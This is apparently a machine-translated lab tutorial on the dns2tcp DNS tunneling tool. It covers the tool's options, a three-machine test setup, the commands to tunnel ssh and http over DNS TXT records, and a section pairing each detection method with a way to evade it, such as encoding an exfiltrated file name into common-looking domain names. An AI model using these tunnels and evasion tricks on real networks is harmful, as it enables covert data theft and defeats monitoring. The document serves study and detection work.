content
foreword
This article studies a tool for DNS tunneling, dns2tcp
github:https://github.com/alex-sector/dns2tcp
I. Overview
1 Introduction
Last updated in 2017, written in C
TCP over DNS, that is, forwarding TCP connections through DNS tunnels without encryption. Direct connection is adopted, but the speed is not particularly optimistic. The advantage is that kali directly integrates this tool, and some linux distributions can also be downloaded directly through the package tool, which is relatively convenient
- DNS Tunneling Using Legal DNS Servers
- C/S (dns2tcpc/dns2tcpd) structure
- By default, data is transmitted through TXT record encryption (base64) (A record has a limited length)
- After the tunnel is established, the connection is maintained, and a data packet is sent out in about 0.6s, and the maximum is 3s can be set
- Need to cooperate with other proxy tools
2. Principle
See the principle of DNS: One article to understand DNS and domain name resolution
This tool is to put the data in the TXT record base64 encrypted transmission, DNS data packets through the NS record and A record provided by the authoritative DNS server to the DNS server of the server to complete the traffic proxy
3. Usage
Common commands:
-c 大流量压缩
-F 前台运行
-f 指定配置文件
-r 指定使用的资源
-z 指定DNS域名
-k 设置传输密码
-l 侦听本地端口
-d 编译水平(1 | 2 |3 )
(1) Server
Modify the /etc/dns2tcpd.conf
configuration file
and establish a tunneldns2tcpd -F -d 1 -f /etc/dns2tcpd.conf
(2) Client
Test whether it can be connected: dns2tcpc -z xxx.xx.xxx
establish a tunnel and use the ssh service: dns2tcpc -c -k password -d 1 -l 7002 -r ssh -z xxx.xx.xxx
then throw the corresponding service into the locally set port
2. Practice
1. Test scenario
(1) Attack aircraft
Kali2021 192.168.10.128
(2) DNS server
windows server 2008 :192.168.10.200
Set static IP, see https://blog.csdn.net/pockeyfan/article/details/42063683
Create a new A record, point to the server kali
Create a new delegate (ie NS record) to point to the domain name of the A record just set
Create another A record to point to the windows server itself
(3) Target machine
Ubuntu 18.04 192.168.10.129
Since the simulated DNS server is a real authoritative server, that is, the target machine should be able to resolve DNS to the DNS server, so the DNS resolution of the target machine should be changed.
nslookup detection
2. Establish a tunnel
(1) Server
start the apache service
Modify the configuration file
after modification
start listening
(2) Client
test for connectivity
start up
Then you can access the http service
Similarly, there are various proxy methods such as ssh, nc, and smtp, which can be proxy through the tunnel
. Note: ssh will occasionally prompt to reset peer, and it may take a few more tries.
3. Take a look at the package
In the handshake phase
, the heartbeat packets are all legitimate domain names
. When using the tunnel, a large number of TXT record packets are stored in the domain name after base64 encryption.
3. Explore
1. Source code and analysis
ALL
2. Detection and bypass
(1) The number of abnormal DNS packets
As shown in the figure above, when using the DNS tunnel, there will be nearly 200 DNS packets within 1s, and they all come from the same DNS server
Bypass method: add interval in the middle, but this will lead to very slow speed
(2) Special record type TXT
Usually only the mail server/gateway will send TXT records, and there will not be such a large number. In normal DNS network traffic, the proportion of TXT records may only be 1%-2%
Bypass method: Mixed use of A, AAAA, TXT, MX, CNAME and other records
(3) Abnormal domain name
There are strings similar to base64 in the domain name, which can be detected by methods such as information entropy
Bypass method: maintain a dictionary of common domain names, and then split, but this will greatly increase the number of packets
比如现在要把一个文件名 finalexamanswer.doc 传出去
base64 一下 -> ZmluYWxleGFtYW5zd2VyLmRvYw
然后编码常用域名,变成 Zm -> zone.music.domain,lu -> login.user.domain,YW``yun.web.domain …
(4) Heartbeat package
The interval and number of heartbeat packets are both problems
Bypass method: The interval can be adjusted to be longer, or even random, and the number can be changed to UDP socket to re-establish the tunnel
(5) Command features
Some characteristic strings of commands
Bypass method: change the string
Epilogue
Heartbeat packets are good for normal domain name requests, but there is still some room for improvement